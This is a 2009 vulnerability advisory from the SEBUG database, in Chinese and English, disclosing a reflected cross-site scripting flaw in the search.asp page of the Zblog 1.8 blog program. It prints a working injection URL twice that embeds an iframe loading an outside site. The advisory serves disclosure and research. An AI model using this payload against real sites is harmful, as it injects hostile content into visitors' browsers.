Zblog 1.8
Zblog1.8 search.asp 跨站漏洞
SEBUG-ID:19246
SEBUG-Appdir:Z-BLOG
Published:2009-12-25
author:猪哥靓 (67856456_at_qq.com)
Vulnerable:
Discription:
北洋贱队(http://bbs.seceye.org) Zblog是基于Asp平台的Blog博客(网志)程序 search.asp在对用户提交数据处理上存在安全漏洞。 demo: http://localhost/search.asp?q=%3Ciframe+src%3Dhttp%3A%2F%2Fwww.gohack.org+insafe
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
http://localhost/search.asp?q=%3Ciframe+src%3Dhttp%3A%2F%2Fwww.gohack.org+insafe
SEBUG Solution:
等待官方发补丁
// sebug.net [2010-03-10]